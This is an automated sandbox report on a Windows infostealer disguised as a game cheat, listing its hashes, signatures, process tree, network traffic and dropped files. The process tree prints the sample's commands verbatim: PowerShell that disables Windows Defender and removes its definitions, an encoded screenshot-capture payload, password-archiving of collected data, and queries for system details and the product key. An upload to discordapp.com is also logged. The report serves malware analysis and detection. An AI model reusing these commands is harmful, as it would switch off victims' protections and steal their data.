Analysis

  • max time kernel
    109s
  • max time network
    111s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250410-en
  • resource tags

    arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15/04/2025, 19:02 UTC

General

  • Target

    turan k$yser che@ts.exe

  • Size

    7.8MB

  • MD5

    94dd93a1e09594567ba2f0bc1af13927

  • SHA1

    3d32ca71a96033eb2f9bfe18d9ae7eceea1d1951

  • SHA256

    79bdb910cdbac46bd809d30d00fbffbc4ec040e1149db4e3bd2675bfc7f1cfef

  • SHA512

    e03268ad5a8f23eb2ddaa0a7488b26291360dc5ad52500f4e058ca90be61c8f91e4d61a3e4bbcac3331b6c53dafd6b827b5a60d653a40a0d593ea6aaa818fde8

  • SSDEEP

    196608:KW5HUOXXKApTj9fZwQRCgiIKpdzjPOan7j2y283TOnOt:dxBw8wIKppDO9it

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 53 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\turan k$yser che@ts.exe
    "C:\Users\Admin\AppData\Local\Temp\turan k$yser che@ts.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Users\Admin\AppData\Local\Temp\turan k$yser che@ts.exe
      "C:\Users\Admin\AppData\Local\Temp\turan k$yser che@ts.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5780
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser che@ts.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3572
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turan k$yser che@ts.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2532
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3724
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:460
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:764
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5pe3xbpx\5pe3xbpx.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5340
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES590D.tmp" "c:\Users\Admin\AppData\Local\Temp\5pe3xbpx\CSC4288BD4BCD3444C3B557D020B51D1D83.TMP"
              6⤵
                PID:32
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16882\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\JcRci.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3980
          • C:\Users\Admin\AppData\Local\Temp\_MEI16882\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI16882\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\JcRci.zip" *
            4⤵
            • Executes dropped EXE
            PID:1696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3620
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3568
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2680
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2744
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:3904
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2548
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1472
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4416
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2216
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5060
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3188

      Network

      • flag-us
        DNS
        gstatic.com
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        142.250.200.3
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        ip-api.com
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        nexusrules.officeapps.live.com
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        nexusrules.officeapps.live.com
        IN A
        Response
        nexusrules.officeapps.live.com
        IN CNAME
        prod.nexusrules.live.com.akadns.net
        prod.nexusrules.live.com.akadns.net
        IN A
        52.111.229.48
      • flag-us
        DNS
        nexusrules.officeapps.live.com
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        nexusrules.officeapps.live.com
        IN A
      • flag-us
        DNS
        nexusrules.officeapps.live.com
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        nexusrules.officeapps.live.com
        IN A
      • flag-us
        DNS
        nexusrules.officeapps.live.com
        turan k$yser che@ts.exe
        Remote address:
        8.8.8.8:53
        Request
        nexusrules.officeapps.live.com
        IN A
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        turan k$yser che@ts.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Accept-Encoding: identity
        User-Agent: python-urllib3/2.4.0
        Response
        HTTP/1.1 200 OK
        Date: Tue, 15 Apr 2025 19:02:18 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 163
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • 142.250.200.3:443
        gstatic.com
        tls
        turan k$yser che@ts.exe
        1.4kB
        5.3kB
        10
        9
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        turan k$yser che@ts.exe
        392 B
        552 B
        6
        5

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.130.233:443
        discordapp.com
        tls
        turan k$yser che@ts.exe
        456.4kB
        16.4kB
        336
        287
      • 8.8.8.8:53
        gstatic.com
        dns
        turan k$yser che@ts.exe
        554 B
        471 B
        8
        5

        DNS Request

        gstatic.com

        DNS Response

        142.250.200.3

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

        DNS Request

        1.112.95.208.in-addr.arpa

        DNS Request

        nexusrules.officeapps.live.com

        DNS Request

        nexusrules.officeapps.live.com

        DNS Request

        nexusrules.officeapps.live.com

        DNS Request

        nexusrules.officeapps.live.com

        DNS Response

        52.111.229.48

      MITRE ATT&CK Enterprise v16

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        16a570a930fb6e5d90f1cc29245c77da

        SHA1

        d5b744583424ece6b082faa06029c962708b8246

        SHA256

        fc4a86ae0903da4b1dc336cfc20c858ba24e134de7e3497f64830a72da150bf2

        SHA512

        35e69459a64b8172005e09d48e4356837b636682b7a3aebec93f5c605b1616acff9374acff900f414eb8af332a8f7e958627a87108e4a9a65a3bbeb662f9deb3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        d8b9a260789a22d72263ef3bb119108c

        SHA1

        376a9bd48726f422679f2cd65003442c0b6f6dd5

        SHA256

        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

        SHA512

        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      • C:\Users\Admin\AppData\Local\Temp\5pe3xbpx\5pe3xbpx.dll

        Filesize

        4KB

        MD5

        383b875279b0d560e7525b63e672b3e0

        SHA1

        a6d7ee2243858df10109a53ac1f7e8b5f3941f5c

        SHA256

        f5c528dd918d8df5939d36ff009315e637d26b991d65a7d66bef811acbeca918

        SHA512

        5b0fb072403afab70551bba6b10abdb4f0bfb5dca73d445a8753dc43df6ffc64e8580e9585ce85b5b10eaba68cded2525f2bf614e57f83bdc3ca03a04f0f9b54

      • C:\Users\Admin\AppData\Local\Temp\JcRci.zip

        Filesize

        429KB

        MD5

        e26b3bc402a040e43cfef88be28673c9

        SHA1

        6009ef2c754e951d06b7f5834b037d4897f6f7f9

        SHA256

        5abddffa4636b685ceeca98a69e1256c1fe46d1e91b08ed7499eec4ac6262eeb

        SHA512

        54186c3cc6bcf617a829e31db0c84f823dcdc766c0b9910f6ea208e90812c6225f355a960b73c13bf4a2bed741aa89c90445611ad35602d94755f6f44a825c68

      • C:\Users\Admin\AppData\Local\Temp\RES590D.tmp

        Filesize

        1KB

        MD5

        3ab72afd41fac497b3280e82017de6de

        SHA1

        619b6728280423dcb9da0640503387a0ca18066c

        SHA256

        785acb824237b2d5f0c768fd015ac8c8cb3d3728e3150c8b90d68f37ee0be70e

        SHA512

        e4d7ca59e406b033d9dfcac19487c4dce5a3813d46388b1679d44571336d53da3245f5b7a8a5b2ae4ba5e8614d070a2a3718751b7494469efd5ea4345781bb74

      • C:\Users\Admin\AppData\Local\Temp\_MEI16882\VCRUNTIME140.dll

        Filesize

        117KB

        MD5

        32da96115c9d783a0769312c0482a62d

        SHA1

        2ea840a5faa87a2fe8d7e5cb4367f2418077d66b

        SHA256

        052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4

        SHA512

        616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087

      • C:\Users\Admin\AppData\Local\Temp\_MEI16882\_bz2.pyd

        Filesize

        49KB

        MD5

        d445b66c80c38f484dfd22c5bc99bfd6

        SHA1

        381644ec27f4874031401de9b994acfd8ddf6867

        SHA256

        44afb5ec148a9019f80e976c0649f9e4510cc4fc327b40019cd79cc019f6f6e6

        SHA512

        b25c142eb61246ed758e3cd347e32b22b34b3c7558e9929d9710433b6130e52d8a8f6906d1f69a2752771358967a945db9f064f1d0a6ab9db5eecbe33c2df8c8

